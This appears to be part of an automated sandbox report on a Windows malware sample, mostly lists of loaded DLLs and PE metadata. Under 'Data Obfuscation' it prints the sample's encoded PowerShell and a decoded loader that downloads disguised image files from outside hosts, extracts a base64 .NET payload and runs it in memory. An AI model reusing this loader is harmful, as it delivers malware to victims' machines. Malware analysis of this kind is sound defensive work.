        Source: C:\Windows\System32\cmd.exe | Section loaded: policymanager.dll
        Source: C:\Windows\System32\cmd.exe | Section loaded: msvcp110_win.dll
        Source: C:\Windows\System32\cmd.exe | Section loaded: sspicli.dll
        Source: C:\Windows\System32\cmd.exe | Section loaded: wintypes.dll
        Source: C:\Windows\System32\cmd.exe | Section loaded: appresolver.dll
        Source: C:\Windows\System32\cmd.exe | Section loaded: bcp47langs.dll
        Source: C:\Windows\System32\cmd.exe | Section loaded: slc.dll
        Source: C:\Windows\System32\cmd.exe | Section loaded: userenv.dll
        Source: C:\Windows\System32\cmd.exe | Section loaded: sppc.dll
        Source: C:\Windows\System32\cmd.exe | Section loaded: onecorecommonproxystub.dll
        Source: C:\Windows\System32\cmd.exe | Section loaded: onecoreuapcommonproxystub.dll
        Source: C:\Windows\System32\cmd.exe | Section loaded: pcacli.dll
        Source: C:\Windows\System32\cmd.exe | Section loaded: mpr.dll
        Source: C:\Windows\System32\cmd.exe | Section loaded: sfc_os.dll
        Source: C:\Windows\System32\wscript.exe | Section loaded: version.dll
        Source: C:\Windows\System32\wscript.exe | Section loaded: kernel.appcore.dll
        Source: C:\Windows\System32\wscript.exe | Section loaded: uxtheme.dll
        Source: C:\Windows\System32\wscript.exe | Section loaded: sxs.dll
        Source: C:\Windows\System32\wscript.exe | Section loaded: vbscript.dll
        Source: C:\Windows\System32\wscript.exe | Section loaded: amsi.dll
        Source: C:\Windows\System32\wscript.exe | Section loaded: userenv.dll
        Source: C:\Windows\System32\wscript.exe | Section loaded: profapi.dll
        Source: C:\Windows\System32\wscript.exe | Section loaded: wldp.dll
        Source: C:\Windows\System32\wscript.exe | Section loaded: msasn1.dll
        Source: C:\Windows\System32\wscript.exe | Section loaded: cryptsp.dll
        Source: C:\Windows\System32\wscript.exe | Section loaded: rsaenh.dll
        Source: C:\Windows\System32\wscript.exe | Section loaded: cryptbase.dll
        Source: C:\Windows\System32\wscript.exe | Section loaded: msisip.dll
        Source: C:\Windows\System32\wscript.exe | Section loaded: wshext.dll
        Source: C:\Windows\System32\wscript.exe | Section loaded: scrobj.dll
        Source: C:\Windows\System32\wscript.exe | Section loaded: mpr.dll
        Source: C:\Windows\System32\wscript.exe | Section loaded: scrrun.dll
        Source: C:\Windows\System32\wscript.exe | Section loaded: windows.storage.dll
        Source: C:\Windows\System32\wscript.exe | Section loaded: propsys.dll
        Source: C:\Windows\System32\wscript.exe | Section loaded: edputil.dll
        Source: C:\Windows\System32\wscript.exe | Section loaded: urlmon.dll
        Source: C:\Windows\System32\wscript.exe | Section loaded: iertutil.dll
        Source: C:\Windows\System32\wscript.exe | Section loaded: srvcli.dll
        Source: C:\Windows\System32\wscript.exe | Section loaded: netutils.dll
        Source: C:\Windows\System32\wscript.exe | Section loaded: windows.staterepositoryps.dll
        Source: C:\Windows\System32\wscript.exe | Section loaded: sspicli.dll
        Source: C:\Windows\System32\wscript.exe | Section loaded: wintypes.dll
        Source: C:\Windows\System32\wscript.exe | Section loaded: appresolver.dll
        Source: C:\Windows\System32\wscript.exe | Section loaded: bcp47langs.dll
        Source: C:\Windows\System32\wscript.exe | Section loaded: slc.dll
        Source: C:\Windows\System32\wscript.exe | Section loaded: sppc.dll
        Source: C:\Windows\System32\wscript.exe | Section loaded: onecorecommonproxystub.dll
        Source: C:\Windows\System32\wscript.exe | Section loaded: onecoreuapcommonproxystub.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kernel.appcore.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rsaenh.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptbase.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: userenv.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: profapi.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.storage.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wldp.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msasn1.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: gpapi.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshext.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appxsip.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: opcservices.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: secur32.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sspicli.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: uxtheme.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kernel.appcore.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rsaenh.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptbase.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: userenv.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wldp.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.storage.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: profapi.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msasn1.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshext.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appxsip.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: opcservices.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: gpapi.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: secur32.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sspicli.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: uxtheme.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rasapi32.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rasman.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rtutils.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mswsock.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: winhttp.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ondemandconnroutehelper.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: iphlpapi.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dhcpcsvc6.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dhcpcsvc.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dnsapi.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: winnsi.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rasadhlp.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: fwpuclnt.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: schannel.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mskeyprotect.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ntasn1.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ncrypt.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ncryptsslp.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: urlmon.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: iertutil.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: srvcli.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: netutils.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: propsys.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wininet.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kdscli.dll
        Source: C:\Windows\System32\wscript.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
        Source: 00wVZ1NU5b.exe | Static PE information: Image base 0x140000000 > 0x60000000
        Source: 00wVZ1NU5b.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
        Source: 00wVZ1NU5b.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
        Source: 00wVZ1NU5b.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
        Source: 00wVZ1NU5b.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
        Source: 00wVZ1NU5b.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
        Source: 00wVZ1NU5b.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
        Source: 00wVZ1NU5b.exe | Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
        Source: Binary string: wextract.pdb source: 00wVZ1NU5b.exe
        Source: Binary string: wextract.pdbGCTL source: 00wVZ1NU5b.exe
        Source: Binary string: corlib.pdbpdblib.pdbf"fh* source: powershell.exe, 00000007.00000002.2174893895.00000218A908A000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: CallSite.Target.pdbp source: powershell.exe, 00000007.00000002.2200132855.00000218C30AB000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: ib.pdbS source: powershell.exe, 00000007.00000002.2202017383.00000218C3434000.00000004.00000020.00020000.00000000.sdmp
        Source: 00wVZ1NU5b.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
        Source: 00wVZ1NU5b.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
        Source: 00wVZ1NU5b.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
        Source: 00wVZ1NU5b.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
        Source: 00wVZ1NU5b.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

        Data Obfuscation

        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: $dosigo = 'WwBO@GU@d@@u@FM@ZQBy@HY@aQBj@GU@U@Bv@Gk@bgB0@E0@YQBu@GE@ZwBl@HI@XQ@6@Do@UwBl@GM@dQBy@Gk@d@B5@F@@cgBv@HQ@bwBj@G8@b@@g@D0@I@Bb@E4@ZQB0@C4@UwBl@GM@dQBy@Gk@d@B5@F@@cgBv@HQ@bwBj@G8@b@BU@Hk@c@Bl@F0@Og@6@FQ@b@Bz@DE@Mg@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@ZgB1@G4@YwB0@Gk@bwBu@C@@R@Bv@Hc@bgBs@G8@YQBk@EQ@YQB0@GE@RgBy@G8@bQBM@Gk@bgBr@HM@I@B7@C@@c@Bh@HI@YQBt@C@@K@Bb@HM@d@By@Gk@bgBn@Fs@XQBd@CQ@b@Bp@G4@awBz@Ck@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@B3@GU@YgBD@Gw@aQBl@G4@d@@g@D0@I@BO@GU@dw@t@E8@YgBq@GU@YwB0@C@@UwB5@HM@d@Bl@G0@LgBO@GU@d@@u@Fc@ZQBi@EM@b@Bp@GU@bgB0@Ds@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@Bz@Gg@dQBm@GY@b@Bl@GQ@T@Bp@G4@awBz@C@@PQ@g@Ec@ZQB0@C0@UgBh@G4@Z@Bv@G0@I@@t@Ek@bgBw@HU@d@BP@GI@agBl@GM@d@@g@CQ@b@Bp@G4@awBz@C@@LQBD@G8@dQBu@HQ@I@@k@Gw@aQBu@Gs@cw@u@Ew@ZQBu@Gc@d@Bo@Ds@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@ZgBv@HI@ZQBh@GM@a@@g@Cg@J@Bs@Gk@bgBr@C@@aQBu@C@@J@Bz@Gg@dQBm@GY@b@Bl@GQ@T@Bp@G4@awBz@Ck@I@B7@C@@d@By@Hk@I@B7@C@@cgBl@HQ@dQBy@G4@I@@k@Hc@ZQBi@EM@b@Bp@GU@bgB0@C4@R@Bv@Hc@bgBs@G8@YQBk@EQ@YQB0@GE@K@@k@Gw@aQBu@Gs@KQ@g@H0@I@Bj@GE@d@Bj@Gg@I@B7@C@@YwBv@G4@d@Bp@G4@dQBl@C@@fQ@g@H0@Ow@g@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@By@GU@d@B1@HI@bg@g@CQ@bgB1@Gw@b@@g@H0@Ow@g@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@k@Gw@aQBu@Gs@cw@g@D0@I@B@@Cg@JwBo@HQ@d@Bw@HM@Og@v@C8@YgBp@HQ@YgB1@GM@awBl@HQ@LgBv@HI@Zw@v@GQ@ZgBn@Gg@Z@@v@GY@ZwBk@C8@Z@Bv@Hc@bgBs@G8@YQBk@HM@LwB0@GU@cwB0@C4@agBw@Gc@Pw@x@DM@Nw@x@DE@Mw@n@Cw@I@@n@Gg@d@@z@DU@LwBu@GE@bgBv@C8@cgBl@GY@cw@v@Gg@ZQBh@GQ@cw@v@G0@YQBp@G4@LwBu@GU@dwBf@Gk@bQBn@DE@Mg@z@C4@agBw@Gc@Jw@p@Ds@DQ@K@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@Bp@G0@YQBn@GU@QgB5@HQ@ZQBz@C@@PQ@g@EQ@bwB3@G4@b@Bv@GE@Z@BE@GE@d@Bh@EY@cgBv@G0@T@Bp@G4@awBz@C@@J@Bs@Gk@bgBr@HM@Ow@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@Bp@GY@I@@o@CQ@aQBt@GE@ZwBl@EI@eQB0@GU@cw@g@C0@bgBl@C@@J@Bu@HU@b@Bs@Ck@I@B7@C@@J@Bp@G0@YQBn@GU@V@Bl@Hg@d@@g@D0@I@Bb@FM@eQBz@HQ@ZQBt@C4@V@Bl@Hg@d@@u@EU@bgBj@G8@Z@Bp@G4
@ZwBd@Do@OgBV@FQ@Rg@4@C4@RwBl@HQ@UwB0@HI@aQBu@Gc@K@@k@Gk@bQBh@Gc@ZQBC@Hk@d@Bl@HM@KQ@7@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@CQ@cwB0@GE@cgB0@EY@b@Bh@Gc@I@@9@C@@Jw@8@Dw@QgBB@FM@RQ@2@DQ@XwBT@FQ@QQBS@FQ@Pg@+@Cc@Ow@g@CQ@ZQBu@GQ@RgBs@GE@Zw@g@D0@I@@n@Dw@P@BC@EE@UwBF@DY@N@Bf@EU@TgBE@D4@Pg@n@Ds@I@@k@HM@d@Bh@HI@d@BJ@G4@Z@Bl@Hg@I@@9@C@@J@Bp@G0@YQBn@GU@V@Bl@Hg@d@@u@Ek@bgBk@GU@e@BP@GY@K@@k@HM@d@Bh@HI@d@BG@Gw@YQBn@Ck@Ow@g@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@k@GU@bgBk@Ek@bgBk@GU@e@@g@D0@I@@k@Gk@bQBh@Gc@ZQBU@GU@e@B0@C4@SQBu@GQ@ZQB4@E8@Zg@o@CQ@ZQBu@GQ@RgBs@GE@Zw@p@Ds@DQ@K@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@aQBm@C@@K@@k@HM@d@Bh@HI@d@BJ@G4@Z@Bl@Hg@I@@t@Gc@ZQ@g@D@@I@@t@GE@bgBk@C@@J@Bl@G4@Z@BJ@G4@Z@Bl@Hg@I@@t@Gc@d@@g@CQ@cwB0@GE@cgB0@Ek@bgBk@GU@e@@p@C@@ew@g@CQ@cwB0@GE@cgB0@Ek@bgBk@GU@e@@g@Cs@PQ@g@CQ@cwB0@GE@cgB0@EY@b@Bh@Gc@LgBM@GU@bgBn@HQ@a@@7@C@@DQ@K@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@CQ@YgBh@HM@ZQ@2@DQ@T@Bl@G4@ZwB0@Gg@I@@9@C@@J@Bl@G4@Z@BJ@G4@Z@Bl@Hg@I@@t@C@@J@Bz@HQ@YQBy@HQ@SQBu@GQ@ZQB4@Ds@DQ@K@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@Bi@GE@cwBl@DY@N@BD@G8@bQBt@GE@bgBk@C@@PQ@g@CQ@aQBt@GE@ZwBl@FQ@ZQB4@HQ@LgBT@
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Anti Malware Scan Interface: Assembly]::Load($commandBytes); $EncodedText =[Convert]::ToBase64String($Bytes); $compressedByteArray = Get-CompressedByteArray -byteArray $encText $type = $loadedAssembly.GetTy
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Anti Malware Scan Interface: FromBase64String($base64Command); $text = $EncodedText; $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $EncodedText =[Convert]::ToBase64String($Bytes); $compressedB
        Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$dosigo = '...'"
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $shuffledLinks = Get-Random -InputObject $links -Count $links.Length; foreach ($link in $shuffledLinks) { try { return $webClient.DownloadData($link) } catch { continue } }; return $null }; $links = @('https://bitbucket.org/dfghd/fgd/downloads/test.jpg?137113', 'ht35/nano/refs/heads/main/new_img123.jpg'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $EncodedText =[Convert]::ToBase64String($Bytes); $commandBytes = [System.Convert]::FromBase64String($base64Command); $text = $EncodedText; $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $EncodedText =[Convert]::ToBase64String($Bytes); $compressedByteArray = Get-CompressedByteArray -byteArray $encText $type = $loadedAssembly.GetType('testpowershell.Hoaaaaaasdme'); $EncodedText =[Convert]::ToBase64String($Bytes); $method = $type.GetMethod('lfsgeddddddda').Invoke($null, [object[]] ('txt.ihbddiI/selif/gro.makuresadsehteb//:s', '0', 'StartupName', 'RegAsm', '0'))}}" .exe -windowstyle hidden -exec
        Source: 00wVZ1NU5b.exe Static PE information: 0xE28C79B4 [Sun Jun 11 09:36:52 2090 UTC]
        Source: C:\Users\user\Desktop\00wVZ1NU5b.exe Code function: 0_2_00007FF7E74F3214 GetSystemDirectoryA,LoadLibraryA,GetProcAddress,DecryptFileA,FreeLibrary,GetWindowsDirectoryA,SetCurrentDirectoryA,0_2_00007FF7E74F3214
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 7_2_00007FFD34847913 push ebx; retf 7_2_00007FFD3484796A
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 7_2_00007FFD3484785D push ebx; retf 7_2_00007FFD3484796A
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 7_2_00007FFD34911546 push ss; ret 7_2_00007FFD3491166B
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 7_2_00007FFD34916109 push esp; ret 7_2_00007FFD3491612B
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 7_2_00007FFD34915112 push ss; ret 7_2_00007FFD34915113
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 7_2_00007FFD3491011A push ss; ret 7_2_00007FFD3491011B
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 7_2_00007FFD34913CE2 push ss; ret 7_2_00007FFD34913CE3
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 7_2_00007FFD34916CEC push esp; ret 7_2_00007FFD34916D03
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 7_2_00007FFD349168F2 push esp; ret 7_2_00007FFD349168F3
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 7_2_00007FFD349168F5 push ss; ret 7_2_00007FFD34916913
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 7_2_00007FFD3491614A push ss; ret 7_2_00007FFD3491614B
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 7_2_00007FFD34916D22 push ss; ret 7_2_00007FFD34916D23
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 7_2_00007FFD34912128 push esp; ret 7_2_00007FFD34912143
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 7_2_00007FFD3491652A push ss; ret 7_2_00007FFD3491652B
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 7_2_00007FFD34911082 push ss; ret 7_2_00007FFD34911083
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 7_2_00007FFD34913092 push ss; ret 7_2_00007FFD34913093
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 7_2_00007FFD34910062 push ss; ret 7_2_00007FFD34910063
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 7_2_00007FFD34910C62 push ss; ret 7_2_00007FFD34910C63
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 7_2_00007FFD3491547A push ss; ret 7_2_00007FFD3491547B
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 7_2_00007FFD349124D2 push ss; ret 7_2_00007FFD349124D3
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 7_2_00007FFD34914202 push ss; ret 7_2_00007FFD34914203
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 7_2_00007FFD34910613 push ss; ret 7_2_00007FFD3491061B
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 7_2_00007FFD34916619 push esp; ret 7_2_00007FFD3491663B
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 7_2_00007FFD34913258 push esp; ret 7_2_00007FFD3491325B
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 7_2_00007FFD3491725A push ss; ret 7_2_00007FFD3491725B
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 7_2_00007FFD34912162 push ss; ret 7_2_00007FFD34912163
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 7_2_00007FFD34912965 push edx; ret 7_2_00007FFD3491296B
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 7_2_00007FFD3491296D push esp; ret 7_2_00007FFD34912B83
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 7_2_00007FFD349101D2 push ss; ret 7_2_00007FFD349101D3
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 7_2_00007FFD34914DDA push ss; ret 7_2_00007FFD34914DDB
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 7_2_00007FFD349109A5 push ss; ret 7_2_00007FFD349109E3
        Source: C:\Users\user\Desktop\00wVZ1NU5b.exe Code function: 0_2_00007FF7E74F15F4 CompareStringA,GetFileAttributesA,LocalAlloc,GetPrivateProfileIntA,GetPrivateProfileStringA,GetShortPathNameA,CompareStringA,LocalAlloc,LocalAlloc,GetFileAttributesA,0_2_00007FF7E74F15F4
        Source: C:\Users\user\Desktop\00wVZ1NU5b.exe Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce wextract_cleanup0

        Hooking and other Techniques for Hiding and Protection

        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
        Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
